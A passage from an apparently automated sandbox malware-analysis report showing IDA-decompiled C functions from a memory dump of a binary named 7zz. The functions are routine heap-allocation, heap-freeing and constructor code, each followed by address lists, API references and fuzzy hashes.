					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}

0x0042a0bd
0x0042a0c7
0x0042a0cf
0x0042a0d8
0x0042a0e7
0x0042a0da
0x0042a0e2
0x0042a0e2
0x0042a0ee
0x0042a0fa
0x0042a0fc
0x0042a103
0x0042a10c
0x0042a111
0x0042a114
0x0042a138
0x0042a13d
0x0042a143
0x0042a147
0x0042a14a
0x0042a14d
0x0042a150
0x0042a153
0x0042a15d
0x0042a162
0x0042a168
0x0042a16b
0x0042a18a
0x0042a18a
0x0042a191
0x0042a19a
0x0042a19d
0x0042a1a1
0x0042a1a3
0x0042a1a8
0x0042a1ad
0x0042a1ad
0x0042a1b0
0x0042a116
0x0042a116
0x0042a119
0x0042a11f
0x0042a124
0x0042a124
0x0042a127
0x0042a127
0x0042a1b8
0x0042a1c0

APIs

__EH_prolog.LIBCMT ref: 0042A0BD

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
Instruction ID: 543cb986228c99d3567dbcd824bb6bb0964835257bbb1fe3b9b9a9f66e7197fe
Opcode Fuzzy Hash: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
Instruction Fuzzy Hash: B541BC70A00256CFCB24CF58D48486ABBF2FF48324B248AAED4969B351C730ED56CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0046C003 Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0046C003(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x47c848);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x496584; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x49015c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0046E56A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E0046F902(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0046C0C9();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x49657c; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x496580); // executed
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E0046EE5F();
						_v8 = _v8 | 0xffffffff;
						E0046C06A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x0046c006
0x0046c008
0x0046c00d
0x0046c018
0x0046c019
0x0046c026
0x0046c02e
0x0046c073
0x0046c076
0x00000000
0x0046c078
0x0046c078
0x0046c07b
0x0046c07d
0x0046c089
0x0046c07f
0x0046c07f
0x0046c082
0x0046c082
0x0046c08a
0x0046c08d
0x0046c093
0x0046c0c3
0x0046c0c3
0x00000000
0x0046c095
0x0046c097
0x0046c09c
0x0046c09d
0x0046c0b0
0x0046c0b3
0x0046c0b7
0x0046c0bc
0x0046c0bf
0x0046c0c1
0x00000000
0x00000000
0x0046c0c1
0x0046c093
0x0046c030
0x0046c030
0x0046c033
0x0046c039
0x0046c0d2
0x0046c0d2
0x0046c0d5
0x0046c0d7
0x0046c0db
0x0046c0db
0x0046c0df
0x0046c0df
0x0046c0e1
0x0046c0e2
0x0046c0e2
0x0046c0ea
0x0046c03f
0x0046c041
0x0046c047
0x0046c04b
0x0046c052
0x0046c055
0x0046c059
0x0046c05e
0x0046c063
0x00000000
0x00000000
0x0046c065
0x0046c063
0x0046c039
0x0046c0f3
0x0046c0fe

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C0EA

Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
Instruction ID: fa3294983cb7f1a3e0ff108d5f2fbcd3700c82697a380beb40c47041fad90e01
Opcode Fuzzy Hash: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
Instruction Fuzzy Hash: 8821CC31A40204EBDB10DFA5DC82BAE7764FB00764F20412BF455E72D1E77D9D41865E

Uniqueness

Uniqueness Score: -1.00%

Function 0046C0FF Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0046C0FF(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x47c860);
				_push(E0046CE74);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x496584; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0046E56A(9);
							_v8 = 1;
							_t24 = E0046F866(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								E0046F8BD(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E0046C1C1();
							goto L9;
						}
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = E0046EB0B(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							E0046EB36();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E0046C169();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x496580); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}

0x0046c102
0x0046c104
0x0046c109
0x0046c10e
0x0046c114
0x0046c115
0x0046c122
0x0046c127
0x0046c12d
0x0046c135
0x0046c175
0x0046c1ca
0x00000000
0x0046c177
0x0046c179
0x0046c17f
0x0046c18f
0x0046c197
0x0046c19c
0x0046c1a5
0x0046c1aa
0x0046c1ad
0x0046c1b1
0x00000000
0x0046c1b6
0x0046c137
0x0046c139
0x0046c13f
0x0046c144
0x0046c14a
0x0046c14f
0x0046c151
0x0046c152
0x0046c153
0x0046c159
0x0046c15a
0x0046c15e
0x0046c163
0x0046c1ba
0x0046c1ba
0x0046c1bc
0x0046c1cb
0x0046c1cb
0x0046c1d3
0x0046c1d3
0x0046c1ba
0x0046c135
0x0046c1dc
0x0046c1e7

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074), ref: 0046C1D3

Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapInitialize
String ID:
API String ID: 641406236-0
Opcode ID: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
Instruction ID: 879b8716ea47b65f01d40709131112694f9f6cb808c508230637e9ff792a2c59
Opcode Fuzzy Hash: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
Instruction Fuzzy Hash: 0921C872940204EBDB11DB96DC46BEE77B8EB05724F14052BF415A21D1F73C99408E6F

Uniqueness

Uniqueness Score: -1.00%

Function 0041741C Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041741C(void* __ecx) {
				signed int _t41;
				void* _t50;
				intOrPtr* _t65;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t73;
				void* _t75;

				E0046B890(E00474C5C, _t68);
				_t71 = _t70 - 0x44;
				 *((intOrPtr*)(_t68 - 0x14)) = __ecx + 8;
				E0040862D();
				_t50 = 0;
				_t73 =  *0x490cc4 - _t50; // 0xb
				if(_t73 > 0) {
					 *((intOrPtr*)(_t68 - 0x10)) = 0x490c04;
					do {
						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10))));
						E004174E7(_t68 - 0x50);
						 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
						E00403593(_t68 - 0x44,  *_t65);
						 *((intOrPtr*)(_t68 - 0x4c)) =  *((intOrPtr*)(_t65 + 0x28));
						 *((intOrPtr*)(_t68 - 0x48)) =  *((intOrPtr*)(_t65 + 0x2c));
						_t41 = E0041721B(_t68 - 0x50, _t73,  *((intOrPtr*)(_t65 + 4)),  *((intOrPtr*)(_t65 + 8))); // executed
						 *((char*)(_t68 - 0x50)) = _t41 & 0xffffff00 |  *((intOrPtr*)(_t65 + 0x2c)) != 0x00000000;
						 *((char*)(_t68 - 0x18)) =  *((intOrPtr*)(_t65 + 0x24));
						E0040FA26(_t68 - 0x24,  *((intOrPtr*)(_t65 + 0x20)));
						E0046BAB0( *((intOrPtr*)(_t68 - 0x1c)), _t65 + 0xd,  *((intOrPtr*)(_t65 + 0x20)));
						_t71 = _t71 + 0xc;
						_push(_t68 - 0x50);
						E004177F2( *((intOrPtr*)(_t68 - 0x14)));
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						E00405AAF(_t68 - 0x50);
						 *((intOrPtr*)(_t68 - 0x10)) =  *((intOrPtr*)(_t68 - 0x10)) + 4;
						_t50 = _t50 + 1;
						_t75 = _t50 -  *0x490cc4; // 0xb
					} while (_t75 < 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return 0;
			}

0x00417421
0x00417426
0x0041742d
0x00417430
0x00417435
0x00417437
0x0041743d
0x00417445
0x0041744c
0x00417452
0x00417454
0x0041745b
0x00417462
0x0041746d
0x00417473
0x0041747c
0x0041748b
0x00417491
0x00417498
0x004174a5
0x004174ad
0x004174b3
0x004174b4
0x004174b9
0x004174c0
0x004174c5
0x004174c9
0x004174ca
0x004174ca
0x004174d7
0x004174de
0x004174e6

APIs

__EH_prolog.LIBCMT ref: 00417421

Part of subcall function 0041721B: __EH_prolog.LIBCMT ref: 00417220

Part of subcall function 004177F2: __EH_prolog.LIBCMT ref: 004177F7

Part of subcall function 00405AAF: __EH_prolog.LIBCMT ref: 00405AB4

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
Instruction ID: a26e6283d8f97d39b918b8293e88733ba3edaa614f90ccffc4ac306d58a1923f
Opcode Fuzzy Hash: 13a03e6f04ffa4cda12192145b7946c11b899e23e86fb6ec3b3771fabe8ff75d
Instruction Fuzzy Hash: 1221BB71D002199FCB10EFE5C9819EEBBB4FF14318F10492EE056A3291DB78AA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042A3CD Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0042A3CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t48;

				E0046B890(E00476E89, _t48);
				_push(__ecx);
				 *((intOrPtr*)(_t48 - 0x10)) = __ecx;
				_t43 = __ecx + 0x10;
				E00421886(__ecx + 0x10); // executed
				 *((intOrPtr*)(__ecx)) = 0x47af30;
				 *((intOrPtr*)(__ecx + 4)) = 0x47ae54;
				 *((intOrPtr*)(__ecx + 8)) = 0x47ae64;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(_t48 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((char*)(_t48 - 4)) = 1;
				E0042A7A4(__ecx + 0x70, 0);
				_t30 = __ecx + 0x244;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				 *((intOrPtr*)(_t30 + 0xc)) = 0;
				 *((intOrPtr*)(_t30 + 0x10)) = 0x10;
				 *_t30 = 0x47b2f8;
				_t31 = __ecx + 0x258;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				 *((intOrPtr*)(_t31 + 0x10)) = 8;
				 *_t31 = 0x47a688;
				 *((char*)(_t48 - 4)) = 4;
				 *((intOrPtr*)(__ecx)) = 0x47b374;
				 *((intOrPtr*)(__ecx + 4)) = 0x47b364;
				 *((intOrPtr*)(__ecx + 8)) = 0x47b350;
				 *((intOrPtr*)(__ecx + 0x14)) = 4;
				 *((char*)(__ecx + 0x240)) = 0;
				E00425658(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return __ecx;
			}

0x0042a3d2
0x0042a3d7
0x0042a3dd
0x0042a3e0
0x0042a3e5
0x0042a3ea
0x0042a3f2
0x0042a3f9
0x0042a400
0x0042a403
0x0042a406
0x0042a40c
0x0042a410
0x0042a415
0x0042a41b
0x0042a41e
0x0042a421
0x0042a424
0x0042a42b
0x0042a431
0x0042a437
0x0042a43a
0x0042a43d
0x0042a440
0x0042a447
0x0042a44f
0x0042a453
0x0042a459
0x0042a460
0x0042a467
0x0042a46e
0x0042a474
0x0042a481
0x0042a489

APIs

__EH_prolog.LIBCMT ref: 0042A3D2

Part of subcall function 00421886: __EH_prolog.LIBCMT ref: 0042188B

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
Instruction ID: 766f131098bcf4af3a9139bea82dcdcfbf831278d29da31b0125813e173acf34
Opcode Fuzzy Hash: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
Instruction Fuzzy Hash: 7A21F2B0901744CFC710DF5AC58868AFBE4FB44704F55C9AEC4AE9B621C3B8A948CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00423DB2 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00423DB2(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				E0046B890(E00476263, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E00408604(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E00408604(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x47b200;
				 *(_t49 - 4) = 5;
				E0040862D();
				 *(_t49 - 4) = 2;
				E00408604(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x47b208;
				 *(_t49 - 4) = 6;
				E0040862D();
				 *(_t49 - 4) = 1;
				E00408604(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				E0040FBE3(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = E004239EF( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}

0x00423db7
0x00423dbc
0x00423dbd
0x00423dc2
0x00423dcb
0x00423dd2
0x00423ddd
0x00423de1
0x00423de6
0x00423dec
0x00423def
0x00423df7
0x00423dfb
0x00423e02
0x00423e06
0x00423e0b
0x00423e0e
0x00423e11
0x00423e19
0x00423e1d
0x00423e24
0x00423e28
0x00423e2d
0x00423e33
0x00423e38
0x00423e43
0x00423e47
0x00423e51
0x00423e59

APIs

__EH_prolog.LIBCMT ref: 00423DB7

Part of subcall function 004239EF: __EH_prolog.LIBCMT ref: 004239F4

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
Instruction ID: 72112a1eb2b5d99c84f1992f09ae961115561c8040eecd3d47dea80afc4ad4fc
Opcode Fuzzy Hash: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
Instruction Fuzzy Hash: 28110470A00648CADB04EBA9C11539EFBE59F60308F01459FD092B32D2CFB81B04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00418E2D Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00418E2D(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				E0046B890(E00474EE0, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x14;
				E00401E26(__ecx + 0x14,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_t21 = E0040B0A0(_t47 - 0x18, _t41);
				 *(_t47 - 4) = 0;
				_t22 = E0040B431(__ecx + 0x20, _t41, _t52,  *_t21); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00407A18( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					E0046B8F4(_t47 + 8, 0x47e128);
				}
				_t24 = E0040862D();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}

0x00418e2d
0x00418e32
0x00418e3c
0x00418e42
0x00418e47
0x00418e4c
0x00418e54
0x00418e60
0x00418e63
0x00418e6f
0x00418e71
0x00418e77
0x00418e7f
0x00418e8a
0x00418e91
0x00418e91
0x00418e99
0x00418e9e
0x00418ea5
0x00418eab
0x00418eb4
0x00418ebc

APIs

__EH_prolog.LIBCMT ref: 00418E32

Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5

Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID:
API String ID: 2062786585-0
Opcode ID: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
Instruction ID: f1c4790c51f2afa5d83b5d7308df39874a94f843b8eefe83d47d115a6bddce3e
Opcode Fuzzy Hash: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
Instruction Fuzzy Hash: 6B01D675A402049EDB20EF26C451ADEBBF5FF84354F00851FE896A32A1CB785649CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00411194 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411194(void* __ecx, void* __edx) {
				void* _t17;
				intOrPtr* _t19;
				char _t20;
				void* _t36;
				void* _t41;

				_t17 = E0046B890(E00474258, _t41);
				_t36 = __ecx;
				if( *((intOrPtr*)(__edx + 4)) != 0) {
					_t17 = E00408A3B(__edx);
